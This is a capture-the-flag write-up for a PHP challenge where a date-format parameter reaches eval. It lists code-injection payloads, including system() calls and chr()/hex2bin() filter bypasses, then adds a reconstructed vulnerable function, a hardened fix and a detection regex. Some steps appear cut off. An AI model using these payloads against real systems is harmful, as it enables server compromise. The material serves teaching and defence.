Lovetok
The website:

We can see that the back-end returns the time when we give a certain value to the format parameter:

We also have the code:
We can see that the input we give, 'r', goes directly into the eval function:

So we need to inject code here somehow -> but how?
We can try different code payloads, like:
${system($_GET[cmd])}&cmd=ls
${print(`ls`)}
To bypass the whitelist:
${system(chr(105).chr(100))}
${system(hex2bin(6964))}
To bypass the restriction on slashes, read
And we get the flag:
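The root cause, and the fix, side by side. This is an added example, not the challenge's own source: it reconstructs the pattern the writeup describes (a user-supplied date format concatenated into a double-quoted string and passed to eval, where PHP's "${...}" interpolation executes the embedded expression) and assumes the filter in front of it only escapes quotes and backslashes, which is why the chr()/hex2bin() payloads above need no quote characters. The function names, the allowlist regex and the probe string are mine.

```php
<?php
// Vulnerable pattern (reconstruction, not the challenge's code): the format string
// lands inside a double-quoted PHP string that is then eval()'d. Inside double
// quotes, "${expr}" is evaluated, so any function call in the input runs.
function vulnerable_time(string $format): string
{
    $format = addslashes($format);          // assumed filter: escapes ' " \ only
    eval('$time = date("' . $format . '");');  // "${...}" in $format executes here
    return $time;
}

// Hardened form: no eval at all. date() treats the format string purely as data;
// a format character can never become a function call. The optional allowlist
// limits input to date() format letters and common separators.
function safe_time(string $format): string
{
    if (!preg_match('/^[dDjlNSwzWFmMntLoXxYyaABgGhHisuveIOPpTZcrU :\\-\\/.,]{1,64}$/', $format)) {
        throw new InvalidArgumentException('unsupported date format');
    }
    return date($format);
}

// Detection helper for logs or a WAF rule: flags the interpolation markers that
// the payloads in the writeup rely on ("${", "$name", backtick execution).
function looks_like_injection(string $format): bool
{
    return (bool) preg_match('/\$\{|\$[a-zA-Z_]|`/', $format);
}

// Demo with a constructed, harmless probe. Under the vulnerable function the
// probe prints the PHP version (proof that the expression executed; PHP also
// emits an undefined-variable warning and, on 8.2+, a deprecation notice).
// Under the hardened function the same input is rejected before date() runs.
$benign = 'r';
$probe  = '${print(phpversion())}';   // constructed probe, no quotes needed

echo "benign / vulnerable: " . vulnerable_time($benign) . PHP_EOL;
echo "probe  / vulnerable: " . vulnerable_time($probe) . PHP_EOL;
echo "benign / safe:       " . safe_time($benign) . PHP_EOL;
try {
    safe_time($probe);
} catch (InvalidArgumentException $e) {
    echo "probe  / safe:       rejected (" . $e->getMessage() . ")" . PHP_EOL;
}
echo "probe flagged: " . (looks_like_injection($probe) ? 'yes' : 'no') . PHP_EOL;
```

The point of the comparison is that escaping quotes (as addslashes does) does not help once input is inside eval: PHP's string interpolation and functions like chr() and hex2bin() let an attacker build any string without quote characters. The only reliable fix is to remove eval and hand the format string to date() directly, with an allowlist as defence in depth.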
